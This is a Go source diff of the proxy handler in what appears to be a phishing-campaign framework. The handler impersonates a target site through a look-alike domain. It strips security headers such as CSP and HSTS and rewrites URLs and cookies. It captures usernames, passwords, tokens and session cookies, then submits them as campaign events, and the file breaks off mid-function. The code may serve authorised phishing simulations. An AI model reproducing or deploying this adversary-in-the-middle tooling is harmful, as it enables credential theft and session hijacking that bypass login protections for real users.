{ + ctx := req.Context() + + // initialize request context + reqCtx, err := m.initializeRequestContext(ctx, req, domain) + if err != nil { + return err + } + + // create http client + client, err := m.createHTTPClient(req, reqCtx.ProxyConfig) + if err != nil { + return errors.Errorf("failed to create proxy HTTP client: %w", err) + } + + // process request + modifiedReq, resp := m.processRequestWithContext(req, reqCtx) + if resp != nil { + return m.writeResponse(w, resp) + } + + // prepare request for target server + m.prepareRequestForTarget(modifiedReq, client) + + // execute request + targetResp, err := client.Do(modifiedReq) + if err != nil { + m.logger.Errorw("failed to execute proxied request", "error", err) + return fmt.Errorf("failed to execute request: %w", err) + } + defer targetResp.Body.Close() + + // process response + finalResp := m.processResponseWithContext(targetResp, reqCtx) + + // write final response + return m.writeResponse(w, finalResp) +} + +func (m *ProxyHandler) extractTargetDomain(domain *database.Domain) string { + targetDomain := domain.ProxyTargetDomain + if targetDomain == "" { + return "" + } + if strings.Contains(targetDomain, "://") { + if parsedURL, err := url.Parse(targetDomain); err == nil { + targetDomain = parsedURL.Host + } + } + return targetDomain +} + +func (m *ProxyHandler) createHTTPClient(req *http.Request, proxyConfig *service.ProxyServiceConfigYAML) (*http.Client, error) { + client := &http.Client{ + Timeout: 30 * time.Second, + Transport: &http.Transport{}, + } + + if proxyConfig.Proxy != "" { + proxyURL, err := url.Parse("http://" + proxyConfig.Proxy) + if err != nil { + return nil, err + } + client.Transport = &http.Transport{ + Proxy: http.ProxyURL(proxyURL), + TLSClientConfig: &tls.Config{ + InsecureSkipVerify: true, + }, + } + } + return client, nil +} + +// initializeRequestContext creates and populates the request context with all necessary data +func (m *ProxyHandler) initializeRequestContext(ctx context.Context, req *http.Request, domain *database.Domain) (*RequestContext, error) { + // setup proxy config + proxyEntry, err := m.ProxyRepository.GetByID(ctx, domain.ProxyID, &repository.ProxyOption{}) + if err != nil { + return nil, errors.Errorf("failed to fetch Proxy config: %w", err) + } + proxyConfig, err := m.parseProxyConfig(proxyEntry.ProxyConfig.MustGet().String()) + if err != nil { + return nil, errors.Errorf("failed to parse Proxy config for domain %s: %w", domain.Name, err) + } + + // extract target domain + targetDomain := m.extractTargetDomain(domain) + if targetDomain == "" { + return nil, errors.Errorf("domain has empty Proxy target domain") + } + + // check for campaign recipient id + campaignRecipientID, paramName := m.getCampaignRecipientIDFromURLParams(req) + + reqCtx := &RequestContext{ + PhishDomain: req.Host, + TargetDomain: targetDomain, + Domain: domain, + ProxyConfig: proxyConfig, + CampaignRecipientID: campaignRecipientID, + ParamName: paramName, + } + + return reqCtx, nil +} + +func (m *ProxyHandler) processRequestWithContext(req *http.Request, reqCtx *RequestContext) (*http.Request, *http.Response) { + // ensure scheme is set + if req.URL.Scheme == "" { + req.URL.Scheme = "https" + } + + reqURL := req.URL.String() + createSession := reqCtx.CampaignRecipientID != nil + + // handle existing session cleanup if this is an initial request + if createSession { + m.cleanupExistingSession(reqCtx.CampaignRecipientID, reqURL) + } else { + // check for existing session + sessionCookie, err := req.Cookie(m.cookieName) + if err == nil && m.isValidSessionCookie(sessionCookie.Value) { + reqCtx.SessionID = sessionCookie.Value + } + } + + // handle requests without session + if reqCtx.SessionID == "" && !createSession { + return m.prepareRequestWithoutSession(req, reqCtx.TargetDomain), nil + } + + // get or create session and populate context + err := m.resolveSessionContext(req, reqCtx, createSession) + if err != nil { + m.logger.Errorw("failed to resolve session context", "error", err) + return req, m.createServiceUnavailableResponse("Service temporarily unavailable") + } + + // apply session-based request processing + return m.applySessionToRequestWithContext(req, reqCtx), nil +} + +func (m *ProxyHandler) cleanupExistingSession(campaignRecipientID *uuid.UUID, reqURL string) { + if existingSessionID := m.findSessionByCampaignRecipient(campaignRecipientID); existingSessionID != "" { + m.sessions.Delete(existingSessionID) + m.campaignRecipientSessions.Delete(campaignRecipientID.String()) + + } +} + +func (m *ProxyHandler) prepareRequestWithoutSession(req *http.Request, targetDomain string) *http.Request { + req.Host = targetDomain + req.URL.Host = targetDomain + req.URL.Scheme = "https" + + return req +} + +// resolveSessionContext gets or creates a session and populates the request context +func (m *ProxyHandler) resolveSessionContext(req *http.Request, reqCtx *RequestContext, createSession bool) error { + if createSession { + newSession, err := m.createNewSession(req, reqCtx.CampaignRecipientID, reqCtx.ProxyConfig, reqCtx.Domain, reqCtx.TargetDomain) + if err != nil { + return err + } + reqCtx.SessionID = newSession.ID + reqCtx.SessionCreated = true + reqCtx.Session = newSession + } else { + // load existing session + sessionVal, exists := m.sessions.Load(reqCtx.SessionID) + if !exists { + return fmt.Errorf("session not found") + } + session, ok := sessionVal.(*ProxySession) + if !ok { + return fmt.Errorf("invalid session type") + } + reqCtx.Session = session + } + + // populate config map once + reqCtx.ConfigMap = m.configToMap(&reqCtx.Session.Config) + return nil +} + +func (m *ProxyHandler) applySessionToRequestWithContext(req *http.Request, reqCtx *RequestContext) *http.Request { + // handle initial request with campaign recipient id + if reqCtx.CampaignRecipientID != nil { + req.Host = reqCtx.Session.TargetDomain + req.URL.Scheme = "https" + req.URL.Host = reqCtx.Session.TargetDomain + // remove campaign recipient id from query params + q := req.URL.Query() + q.Del(reqCtx.ParamName) + req.URL.RawQuery = q.Encode() + } else { + // for subsequent requests, map to original host + originalHost := m.replaceHostWithOriginal(req.Host, reqCtx.ConfigMap) + req.Host = originalHost + req.URL.Host = originalHost + } + + // apply request processing + m.processRequestWithSessionContext(req, reqCtx) + return req +} + +func (m *ProxyHandler) processRequestWithSessionContext(req *http.Request, reqCtx *RequestContext) { + // normalize headers + m.normalizeRequestHeaders(req, reqCtx.Session) + + // apply capture rules + m.onRequestBody(req, reqCtx.Session) + m.onRequestHeader(req, reqCtx.Session) + + // patch query parameters + m.patchQueryParametersWithContext(req, reqCtx) + + // patch request body + m.patchRequestBodyWithContext(req, reqCtx) +} + +func (m *ProxyHandler) patchQueryParametersWithContext(req *http.Request, reqCtx *RequestContext) { + qs := req.URL.Query() + if len(qs) == 0 { + return + } + + for param := range qs { + for i, value := range qs[param] { + qs[param][i] = string(m.patchUrls(reqCtx.ConfigMap, []byte(value), CONVERT_TO_ORIGINAL_URLS)) + } + } + req.URL.RawQuery = qs.Encode() +} + +func (m *ProxyHandler) patchRequestBodyWithContext(req *http.Request, reqCtx *RequestContext) { + if req.Body == nil { + return + } + + body, err := io.ReadAll(req.Body) + if err != nil { + m.logger.Errorw("failed to read request body for patching", "error", err) + return + } + req.Body.Close() + + body = m.patchUrls(reqCtx.ConfigMap, body, CONVERT_TO_ORIGINAL_URLS) + req.Body = io.NopCloser(bytes.NewBuffer(body)) + req.ContentLength = int64(len(body)) +} + +func (m *ProxyHandler) prepareRequestForTarget(req *http.Request, client *http.Client) { + req.RequestURI = "" + req.Header.Del("Accept-Encoding") + + // setup cookie jar for redirect handling + jar, _ := cookiejar.New(nil) + client.Jar = jar + client.CheckRedirect = func(req *http.Request, via []*http.Request) error { + return http.ErrUseLastResponse + } + + // remove proxy session cookie + m.removeProxyCookie(req) +} + +func (m *ProxyHandler) removeProxyCookie(req *http.Request) { + if req.Header.Get("Cookie") == "" { + return + } + + cookies := req.Cookies() + var filteredCookies []*http.Cookie + for _, cookie := range cookies { + if cookie.Name != m.cookieName { + filteredCookies = append(filteredCookies, cookie) + } + } + + req.Header.Del("Cookie") + for _, cookie := range filteredCookies { + req.AddCookie(cookie) + } +} + +func (m *ProxyHandler) processResponseWithContext(resp *http.Response, reqCtx *RequestContext) *http.Response { + if resp == nil { + return nil + } + + // handle responses with or without session + if reqCtx.SessionID != "" && reqCtx.Session != nil { + // capture response data before any rewriting + m.captureResponseDataWithContext(resp, reqCtx) + + // process cookies for phishing domain responses after capture + if reqCtx.PhishDomain != "" { + m.processCookiesForPhishingDomainWithContext(resp, reqCtx) + } + + return m.processResponseWithSessionContext(resp, reqCtx) + } + + // process cookies for phishing domain responses (no session case) + if reqCtx.PhishDomain != "" { + m.processCookiesForPhishingDomainWithContext(resp, reqCtx) + } + + return m.processResponseWithoutSessionContext(resp, reqCtx) +} + +func (m *ProxyHandler) captureResponseDataWithContext(resp *http.Response, reqCtx *RequestContext) { + // capture cookies, headers, and body + m.onResponseCookies(resp, reqCtx.Session) + m.onResponseHeader(resp, reqCtx.Session) + + contentType := resp.Header.Get("Content-Type") + if m.shouldProcessContent(contentType) { + body, _, err := m.readAndDecompressBody(resp) + if err == nil { + m.onResponseBody(resp, body, reqCtx.Session) + resp.Body = io.NopCloser(bytes.NewReader(body)) + } + } +} + +func (m *ProxyHandler) processResponseWithSessionContext(resp *http.Response, reqCtx *RequestContext) *http.Response { + // set session cookie for new sessions + if reqCtx.SessionCreated { + m.setSessionCookieWithContext(resp, reqCtx) + } + + // check for campaign flow progression + if m.shouldRedirectForCampaignFlow(reqCtx.Session, resp.Request) { + if redirectResp := m.createCampaignFlowRedirect(reqCtx.Session, resp); redirectResp != nil { + if reqCtx.SessionCreated { + m.copyCookieToResponse(resp, redirectResp) + } + return redirectResp + } + } + + // apply response rewriting + m.rewriteResponseHeadersWithContext(resp, reqCtx) + m.rewriteResponseBodyWithContext(resp, reqCtx) + + return resp +} + +func (m *ProxyHandler) setSessionCookieWithContext(resp *http.Response, reqCtx *RequestContext) { + cookie := &http.Cookie{ + Name: m.cookieName, + Value: reqCtx.SessionID, + Path: "/", + Domain: "." + reqCtx.PhishDomain, + Expires: time.Now().Add(time.Duration(PROXY_COOKIE_MAX_AGE) * time.Second), + HttpOnly: true, + Secure: true, + SameSite: http.SameSiteLaxMode, + } + resp.Header.Add("Set-Cookie", cookie.String()) +} + +func (m *ProxyHandler) copyCookieToResponse(sourceResp, targetResp *http.Response) { + if cookieHeader := sourceResp.Header.Get("Set-Cookie"); cookieHeader != "" { + targetResp.Header.Set("Set-Cookie", cookieHeader) + } +} + +func (m *ProxyHandler) rewriteResponseHeadersWithContext(resp *http.Response, reqCtx *RequestContext) { + // remove security headers + securityHeaders := []string{ + "Content-Security-Policy", + "Content-Security-Policy-Report-Only", + "Strict-Transport-Security", + "X-XSS-Protection", + "X-Content-Type-Options", + "X-Frame-Options", + } + for _, header := range securityHeaders { + resp.Header.Del(header) + } + + // fix cors headers + if allowOrigin := resp.Header.Get("Access-Control-Allow-Origin"); allowOrigin != "" && allowOrigin != "*" { + if oURL, err := url.Parse(allowOrigin); err == nil { + if phishHost := m.replaceHostWithPhished(oURL.Host, reqCtx.ConfigMap); phishHost != "" { + oURL.Host = phishHost + resp.Header.Set("Access-Control-Allow-Origin", oURL.String()) + } + } + resp.Header.Set("Access-Control-Allow-Credentials", "true") + } + + // fix location header + if location := resp.Header.Get("Location"); location != "" { + if rURL, err := url.Parse(location); err == nil { + if phishHost := m.replaceHostWithPhished(rURL.Host, reqCtx.ConfigMap); phishHost != "" { + rURL.Host = phishHost + resp.Header.Set("Location", rURL.String()) + } + } + } +} + +func (m *ProxyHandler) rewriteResponseBodyWithContext(resp *http.Response, reqCtx *RequestContext) { + contentType := resp.Header.Get("Content-Type") + if !m.shouldProcessContent(contentType) { + return + } + + defer resp.Body.Close() + body, wasCompressed, err := m.readAndDecompressBody(resp) + if err != nil { + m.logger.Errorw("failed to read and decompress response body", "error", err) + return + } + + body = m.patchUrls(reqCtx.ConfigMap, body, CONVERT_TO_PHISHING_URLS) + body = m.applyCustomReplacements(body, reqCtx.Session) + + m.updateResponseBody(resp, body, wasCompressed) + resp.Header.Set("Cache-Control", "no-cache, no-store") +} + +func (m *ProxyHandler) processResponseWithoutSessionContext(resp *http.Response, reqCtx *RequestContext) *http.Response { + // create minimal config for url rewriting + config := m.createMinimalConfig(reqCtx.PhishDomain, reqCtx.TargetDomain) + + // apply basic response processing + m.removeSecurityHeaders(resp) + m.rewriteLocationHeaderWithoutSession(resp, config) + m.rewriteResponseBodyWithoutSessionContext(resp, reqCtx, config) + + return resp +} + +func (m *ProxyHandler) processCookiesForPhishingDomainWithContext(resp *http.Response, reqCtx *RequestContext) { + cookies := resp.Cookies() + if len(cookies) == 0 { + return + } + + tempConfig := map[string]service.ProxyServiceDomainConfig{ + reqCtx.TargetDomain: {To: reqCtx.PhishDomain}, + } + + resp.Header.Del("Set-Cookie") + for _, ck := range cookies { + m.adjustCookieSettings(ck, reqCtx.Session, resp) + m.rewriteCookieDomain(ck, tempConfig, resp) + resp.Header.Add("Set-Cookie", ck.String()) + } +} + +func (m *ProxyHandler) createMinimalConfig(phishDomain, targetDomain string) map[string]service.ProxyServiceDomainConfig { + config := make(map[string]service.ProxyServiceDomainConfig) + var fullConfigYAML *service.ProxyServiceConfigYAML + + dbDomain := &database.Domain{} + if err := m.DomainRepository.DB.Where("name = ?", phishDomain).First(dbDomain).Error; err == nil { + if dbDomain.ProxyID != nil { + dbProxy := &database.Proxy{} + if err := m.ProxyRepository.DB.Where("id = ?", *dbDomain.ProxyID).First(dbProxy).Error; err == nil { + if configYAML, err := m.parseProxyConfig(dbProxy.ProxyConfig); err == nil { + fullConfigYAML = configYAML + for host, hostConfig := range fullConfigYAML.Hosts { + if hostConfig != nil { + config[host] = *hostConfig + } + } + } + } + } + } + + // fallback to basic mapping + if len(config) == 0 { + config[targetDomain] = service.ProxyServiceDomainConfig{To: phishDomain} + } + + // add global rules to all host configurations + if fullConfigYAML != nil && fullConfigYAML.Global != nil { + for originalHost := range config { + hostConfig := config[originalHost] + // append global capture rules + hostConfig.Capture = append(hostConfig.Capture, fullConfigYAML.Global.Capture...) + // append global rewrite rules + hostConfig.Rewrite = append(hostConfig.Rewrite, fullConfigYAML.Global.Rewrite...) + config[originalHost] = hostConfig + } + } + + return config +} + +func (m *ProxyHandler) removeSecurityHeaders(resp *http.Response) { + headers := []string{ + "Content-Security-Policy", + "Content-Security-Policy-Report-Only", + "Strict-Transport-Security", + "X-XSS-Protection", + "X-Content-Type-Options", + "X-Frame-Options", + } + for _, header := range headers { + resp.Header.Del(header) + } +} + +func (m *ProxyHandler) rewriteLocationHeaderWithoutSession(resp *http.Response, config map[string]service.ProxyServiceDomainConfig) { + location := resp.Header.Get("Location") + if location == "" { + return + } + + if rURL, err := url.Parse(location); err == nil { + if phishHost := m.replaceHostWithPhished(rURL.Host, config); phishHost != "" { + rURL.Host = phishHost + resp.Header.Set("Location", rURL.String()) + } + } +} + +func (m *ProxyHandler) rewriteResponseBodyWithoutSessionContext(resp *http.Response, reqCtx *RequestContext, config map[string]service.ProxyServiceDomainConfig) { + contentType := resp.Header.Get("Content-Type") + if !m.shouldProcessContent(contentType) { + return + } + + defer resp.Body.Close() + body, wasCompressed, err := m.readAndDecompressBody(resp) + if err != nil { + m.logger.Errorw("failed to read and decompress response body", "error", err) + return + } + + body = m.patchUrls(config, body, CONVERT_TO_PHISHING_URLS) + body = m.applyCustomReplacementsWithoutSession(body, config, reqCtx.TargetDomain) + + m.updateResponseBody(resp, body, wasCompressed) + if m.shouldCacheControlContent(contentType) { + resp.Header.Set("Cache-Control", "no-cache, no-store") + } +} + +func (m *ProxyHandler) shouldCacheControlContent(contentType string) bool { + return strings.Contains(contentType, "text/html") || + strings.Contains(contentType, "javascript") || + strings.Contains(contentType, "application/json") +} + +func (m *ProxyHandler) patchUrls(config map[string]service.ProxyServiceDomainConfig, body []byte, convertType int) []byte { + hostMap, hosts := m.buildHostMapping(config, convertType) + + // sort hosts by length (longest first) to avoid partial replacements + sort.Slice(hosts, func(i, j int) bool { + return len(hosts[i]) > len(hosts[j]) + }) + + // first pass: urls with schemes + body = m.replaceURLsWithScheme(body, hosts, hostMap) + + // second pass: urls without schemes + body = m.replaceURLsWithoutScheme(body, hosts, hostMap) + + return body +} + +func (m *ProxyHandler) buildHostMapping(config map[string]service.ProxyServiceDomainConfig, convertType int) (map[string]string, []string) { + hostMap := make(map[string]string) + var hosts []string + + for originalHost, hostConfig := range config { + if hostConfig.To == "" { + continue + } + + var from, to string + if convertType == CONVERT_TO_ORIGINAL_URLS { + from = hostConfig.To + to = originalHost + } else { + from = originalHost + to = hostConfig.To + } + + hostMap[strings.ToLower(from)] = to + hosts = append(hosts, strings.ToLower(from)) + } + + return hostMap, hosts +} + +func (m *ProxyHandler) replaceURLsWithScheme(body []byte, hosts []string, hostMap map[string]string) []byte { + return []byte(MATCH_URL_REGEXP.ReplaceAllStringFunc(string(body), func(sURL string) string { + u, err := url.Parse(sURL) + if err != nil { + return sURL + } + + for _, h := range hosts { + if strings.ToLower(u.Host) == h { + return strings.Replace(sURL, u.Host, hostMap[h], 1) + } + } + return sURL + })) +} + +func (m *ProxyHandler) replaceURLsWithoutScheme(body []byte, hosts []string, hostMap map[string]string) []byte { + return []byte(MATCH_URL_REGEXP_WITHOUT_SCHEME.ReplaceAllStringFunc(string(body), func(sURL string) string { + for _, h := range hosts { + if strings.Contains(sURL, h) && !strings.Contains(sURL, hostMap[h]) { + return strings.Replace(sURL, h, hostMap[h], 1) + } + } + return sURL + })) +} + +func (m *ProxyHandler) replaceHostWithOriginal(hostname string, config map[string]service.ProxyServiceDomainConfig) string { + for originalHost, hostConfig := range config { + if strings.EqualFold(hostConfig.To, hostname) { + return originalHost + } + } + return "" +} + +func (m *ProxyHandler) replaceHostWithPhished(hostname string, config map[string]service.ProxyServiceDomainConfig) string { + for originalHost, hostConfig := range config { + if strings.EqualFold(originalHost, hostname) { + return hostConfig.To + } + + // check for subdomain mapping + if strings.HasSuffix(strings.ToLower(hostname), "."+strings.ToLower(originalHost)) { + subdomain := strings.TrimSuffix(hostname, "."+originalHost) + if subdomain != "" { + return subdomain + "." + hostConfig.To + } + return hostConfig.To + } + } + return "" +} + +func (m *ProxyHandler) createNewSession( + req *http.Request, + campaignRecipientID *uuid.UUID, + proxyConfig *service.ProxyServiceConfigYAML, + domain *database.Domain, + targetDomain string, +) (*ProxySession, error) { + ctx := req.Context() + + // get campaign information + campaign, recipientID, campaignID, err := m.getCampaignInfo(ctx, campaignRecipientID) + if err != nil { + return nil, err + } + + // create session configuration + sessionConfig := m.buildSessionConfig(targetDomain, domain.Name, proxyConfig) + + // create session + session := &ProxySession{ + ID: uuid.New().String(), + CampaignRecipientID: campaignRecipientID, + CampaignID: campaignID, + RecipientID: recipientID, + Campaign: campaign, + Domain: domain, + TargetDomain: targetDomain, + CreatedAt: time.Now(), + } + + // initialize session data + m.initializeSession(session, sessionConfig) + + // store session + m.sessions.Store(session.ID, session) + if campaignRecipientID != nil { + m.campaignRecipientSessions.Store(campaignRecipientID.String(), session.ID) + } + + return session, nil +} + +func (m *ProxyHandler) getCampaignInfo(ctx context.Context, campaignRecipientID *uuid.UUID) (*model.Campaign, *uuid.UUID, *uuid.UUID, error) { + cRecipient, err := m.CampaignRecipientRepository.GetByID(ctx, campaignRecipientID, &repository.CampaignRecipientOption{}) + if err != nil { + return nil, nil, nil, fmt.Errorf("invalid campaign recipient ID %s: %w", campaignRecipientID.String(), err) + } + + recipientID, err := cRecipient.RecipientID.Get() + if err != nil { + return nil, nil, nil, fmt.Errorf("campaign recipient %s has no recipient ID: %w", campaignRecipientID.String(), err) + } + + campaignID, err := cRecipient.CampaignID.Get() + if err != nil { + return nil, nil, nil, fmt.Errorf("campaign recipient %s has no campaign ID: %w", campaignRecipientID.String(), err) + } + + campaign, err := m.CampaignRepository.GetByID(ctx, &campaignID, &repository.CampaignOption{ + WithCampaignTemplate: true, + }) + if err != nil { + return nil, nil, nil, fmt.Errorf("failed to get campaign %s: %w", campaignID.String(), err) + } + + return campaign, &recipientID, &campaignID, nil +} + +func (m *ProxyHandler) buildSessionConfig(targetDomain, phishDomain string, proxyConfig *service.ProxyServiceConfigYAML) map[string]service.ProxyServiceDomainConfig { + sessionConfig := map[string]service.ProxyServiceDomainConfig{ + targetDomain: {To: phishDomain}, + } + + // Copy domain-specific proxy config + for originalHost, hostConfig := range proxyConfig.Hosts { + if hostConfig != nil { + sessionConfig[originalHost] = *hostConfig + } + } + + // add global rules to all host configurations + if proxyConfig.Global != nil { + for originalHost := range sessionConfig { + hostConfig := sessionConfig[originalHost] + // append global capture rules + hostConfig.Capture = append(hostConfig.Capture, proxyConfig.Global.Capture...) + // append global rewrite rules + hostConfig.Rewrite = append(hostConfig.Rewrite, proxyConfig.Global.Rewrite...) + sessionConfig[originalHost] = hostConfig + } + } + + return sessionConfig +} + +func (m *ProxyHandler) initializeSession(session *ProxySession, sessionConfig map[string]service.ProxyServiceDomainConfig) { + // store configuration in sync.map + for host, config := range sessionConfig { + session.Config.Store(host, config) + } + + // initialize atomic values + session.IsComplete.Store(false) + session.CookieBundleSubmitted.Store(false) + session.NextPageType.Store("") + + // initialize required captures + m.initializeRequiredCaptures(session) +} + +func (m *ProxyHandler) findSessionByCampaignRecipient(campaignRecipientID *uuid.UUID) string { + if campaignRecipientID == nil { + return "" + } + + sessionIDVal, exists := m.campaignRecipientSessions.Load(campaignRecipientID.String()) + if !exists { + return "" + } + + sessionID := sessionIDVal.(string) + if sessionVal, sessionExists := m.sessions.Load(sessionID); sessionExists { + if _, ok := sessionVal.(*ProxySession); ok { + return sessionID + } + } + + // cleanup orphaned mapping + m.campaignRecipientSessions.Delete(campaignRecipientID.String()) + return "" +} + +func (m *ProxyHandler) initializeRequiredCaptures(session *ProxySession) { + session.Config.Range(func(key, value interface{}) bool { + hostConfig := value.(service.ProxyServiceDomainConfig) + for _, capture := range hostConfig.Capture { + if capture.Required == nil || *capture.Required { + session.RequiredCaptures.Store(capture.Name, false) + } + } + return true + }) +} + +func (m *ProxyHandler) onRequestBody(req *http.Request, session *ProxySession) { + hostConfigInterface, exists := session.Config.Load(req.Host) + if !exists || req.Body == nil { + return + } + + hostConfig := hostConfigInterface.(service.ProxyServiceDomainConfig) + body := m.readRequestBody(req) + + for _, capture := range hostConfig.Capture { + if m.shouldApplyCaptureRule(capture, "request_body", req) { + m.captureFromText(string(body), capture, session, req, "request_body") + } + } + + m.applyRequestBodyReplacements(req, session) +} + +func (m *ProxyHandler) onRequestHeader(req *http.Request, session *ProxySession) { + hostConfigInterface, exists := session.Config.Load(req.Host) + if !exists { + return + } + + hostConfig := hostConfigInterface.(service.ProxyServiceDomainConfig) + var buf bytes.Buffer + req.Header.Write(&buf) + + for _, capture := range hostConfig.Capture { + if m.shouldApplyCaptureRule(capture, "request_header", req) { + m.captureFromText(buf.String(), capture, session, req, "request_header") + } + } +} + +func (m *ProxyHandler) onResponseBody(resp *http.Response, body []byte, session *ProxySession) { + originalHost := resp.Request.Host + if originalHost == "" { + originalHost = session.TargetDomain + } + + hostConfigInterface, exists := session.Config.Load(originalHost) + if !exists { + return + } + + hostConfig := hostConfigInterface.(service.ProxyServiceDomainConfig) + + for _, capture := range hostConfig.Capture { + if m.shouldProcessResponseBodyCapture(capture, resp.Request) { + if capture.Find == "" { + m.handlePathBasedCapture(capture, session, resp) + } else { + m.captureFromText(string(body), capture, session, resp.Request, "response_body") + } + } + } +} + +func (m *ProxyHandler) onResponseCookies(resp *http.Response, session *ProxySession) { + hostConfigInterface, exists := session.Config.Load(resp.Request.Host) + if !exists { + return + } + + hostConfig := hostConfigInterface.(service.ProxyServiceDomainConfig) + cookies := resp.Cookies() + if len(cookies) == 0 { + return + } + + capturedCookies := make(map[string]map[string]string) + + for _, capture := range hostConfig.Capture { + if capture.From == "cookie" && m.matchesPath(capture, resp.Request) { + if cookieData := m.extractCookieData(capture, cookies, resp); cookieData != nil { + capturedCookies[capture.Name] = cookieData + // always overwrite cookie data to ensure we have the latest cookies + // this is important for scenarios like failed login -> successful login + session.CapturedData.Store(capture.Name, cookieData) + m.checkCaptureCompletion(session, capture.Name) + // reset cookie bundle submitted flag since we have new cookie data + // this allows resubmission with the latest cookies after all captures complete + session.CookieBundleSubmitted.Store(false) + } + } + } + + if len(capturedCookies) > 0 { + m.handleCampaignFlowProgression(session, resp.Request) + } + + m.checkAndSubmitCookieBundleWhenComplete(session, resp.Request) +} + +func (m *ProxyHandler) onResponseHeader(resp *http.Response, session *ProxySession) { + hostConfigInterface, exists := session.Config.Load(resp.Request.Host) + if !exists { + return + } + + hostConfig := hostConfigInterface.(service.ProxyServiceDomainConfig) + var buf bytes.Buffer + resp.Header.Write(&buf) + + for _, capture := range hostConfig.Capture { + if m.shouldApplyCaptureRule(capture, "response_header", resp.Request) { + m.captureFromText(buf.String(), capture, session, resp.Request, "response_header") + m.handleImmediateCampaignRedirect(session, resp, resp.Request, "response_header") + } + } +} + +func (m *ProxyHandler) shouldApplyCaptureRule(capture service.ProxyServiceCaptureRule, captureType string, req *http.Request) bool { + // check capture source + if capture.From != "" && capture.From != captureType && capture.From != "any" { + return false + } + + // check method + if capture.Method != "" && capture.Method != req.Method { + return false + } + + // check path + return m.matchesPath(capture, req) +} + +func (m *ProxyHandler) shouldProcessResponseBodyCapture(capture service.ProxyServiceCaptureRule, req *http.Request) bool { + // handle path-based captures + if capture.Path != "" && (capture.Method == "" || capture.Method == req.Method) { + return m.matchesPath(capture, req) + } + + // handle regular response body captures + return m.shouldApplyCaptureRule(capture, "response_body", req) +} + +func (m *ProxyHandler) matchesPath(capture service.ProxyServiceCaptureRule, req *http.Request) bool { + if capture.PathRe == nil { + return true + } + return capture.PathRe.MatchString(req.URL.Path) +} + +func (m *ProxyHandler) handlePathBasedCapture(capture service.ProxyServiceCaptureRule, session *ProxySession, resp *http.Response) { + // only mark as complete if path AND method match exactly + methodMatches := capture.Method == "" || capture.Method == resp.Request.Method + pathMatches := m.matchesPath(capture, resp.Request) + + if methodMatches && pathMatches { + // store captured data before marking complete + capturedData := map[string]string{ + "navigation_path": resp.Request.URL.Path, + "capture_type": "navigation", + } + session.CapturedData.Store(capture.Name, capturedData) + m.checkCaptureCompletion(session, capture.Name) + + if session.CampaignRecipientID != nil && session.CampaignID != nil { + m.createCampaignSubmitEvent(session, capturedData, resp.Request) + } + + // check if cookie bundle should be submitted now that this capture is complete + m.checkAndSubmitCookieBundleWhenComplete(session, resp.Request) + } + + m.handleImmediateCampaignRedirect(session, resp, resp.Request, "path_navigation") +} + +func (m *ProxyHandler) extractCookieData(capture service.ProxyServiceCaptureRule, cookies []*http.Cookie, resp *http.Response) map[string]string { + cookieName := capture.Find + if cookieName == "" { + return nil + } + + for _, cookie := range cookies { + if cookie.Name == cookieName { + return m.buildCookieData(cookie, resp) + } + } + return nil +} + +func (m *ProxyHandler) buildCookieData(cookie *http.Cookie, resp *http.Response) map[string]string { + cookieDomain := cookie.Domain + if cookieDomain == "" { + cookieDomain = resp.Request.Host + } + + isSecure := cookie.Secure + if resp.Request.URL.Scheme == "https" && !isSecure { + isSecure = true + } + + cookieData := map[string]string{ + "name": cookie.Name, + "value": cookie.Value, + "domain": cookieDomain, + "path": cookie.Path, + "capture_time": time.Now().Format(time.RFC3339), + } + + if isSecure { + cookieData["secure"] = "true" + } + if cookie.HttpOnly { + cookieData["httpOnly"] = "true" + } + if cookie.SameSite != http.SameSiteDefaultMode { + cookieData["sameSite"] = m.sameSiteToString(cookie.SameSite) + } + if !cookie.Expires.IsZero() && cookie.Expires.Year() > 1 { + cookieData["expires"] = cookie.Expires.Format(time.RFC3339) + } + if cookie.MaxAge > 0 { + cookieData["maxAge"] = fmt.Sprintf("%d", cookie.MaxAge) + } + if resp.Request.Host != cookieDomain { + cookieData["original_host"] = resp.Request.Host + } + + return cookieData +} + +func (m *ProxyHandler) readRequestBody(req *http.Request) []byte { + body, err := io.ReadAll(req.Body) + if err != nil { + m.logger.Errorw("failed to read request body", "error", err) + return nil + } + req.Body.Close() + req.Body = io.NopCloser(bytes.NewBuffer(body)) + return body +} + +func (m *ProxyHandler) captureFromText(text string, capture service.ProxyServiceCaptureRule, session *ProxySession, req *http.Request, captureContext string) { + if capture.Find == "" { + return + } + + re, err := regexp.Compile(capture.Find) + if err != nil { + m.logger.Errorw("invalid capture regex", "error", err, "pattern", capture.Find) + return + } + + matches := re.FindStringSubmatch(text) + if len(matches) == 0 { + return + } + + capturedData := m.buildCapturedData(matches, capture, session, req, captureContext) + session.CapturedData.Store(capture.Name, capturedData) + m.checkCaptureCompletion(session, capture.Name) + + // submit non-cookie captures immediately + if capture.From != "cookie" && session.CampaignRecipientID != nil && session.CampaignID != nil { + m.createCampaignSubmitEvent(session, capturedData, req) + } + + // check if we should submit cookie bundle (only when all captures complete) + m.checkAndSubmitCookieBundleWhenComplete(session, req) + m.handleCampaignFlowProgression(session, req) +} + +func (m *ProxyHandler) buildCapturedData(matches []string, capture service.ProxyServiceCaptureRule, session *ProxySession, req *http.Request, captureContext string) map[string]string { + capturedData := make(map[string]string) + + // add capture name to the captured data + capturedData["capture_name"] = capture.Name + + if len(matches) > 1 { + for i := 1; i < len(matches); i++ { + capturedData[fmt.Sprintf("group_%d", i)] = matches[i] + } + m.formatCapturedData(capturedData, capture, matches, session, req, captureContext) + } else { + capturedData["matched"] = matches[0] + } + + return capturedData +} + +func (m *ProxyHandler) formatCapturedData(capturedData map[string]string, capture service.ProxyServiceCaptureRule, matches []string, session *ProxySession, req *http.Request, captureContext string) { + captureName := strings.ToLower(capture.Name) + + switch { + case strings.Contains(captureName, "credential") || strings.Contains(captureName, "login"): + if len(matches) >= 3 { + capturedData["username"] = matches[1] + capturedData["password"] = matches[2] + } + case capture.From == "cookie": + if len(matches) >= 2 { + capturedData["cookie_value"] = matches[1] + domain := session.TargetDomain + if captureContext != "response_header" && captureContext != "response_body" { + domain = req.Host + } + if domain != "" { + capturedData["cookie_domain"] = domain + } + } + case strings.Contains(captureName, "token"): + if len(matches) >= 2 { + capturedData["token_value"] = matches[1] + capturedData["token_type"] = capture.Name + } + } +} + +func (m *ProxyHandler) checkCaptureCompletion(session *ProxySession, captureName string) { + if _, exists := session.RequiredCaptures.Load(captureName); exists { + // only mark as complete if we actually have captured data for this capture + if _, hasData := session.CapturedData.Load(captureName); hasData { + session.RequiredCaptures.Store(captureName, true) + + // check if all required captures are complete + allComplete := true + 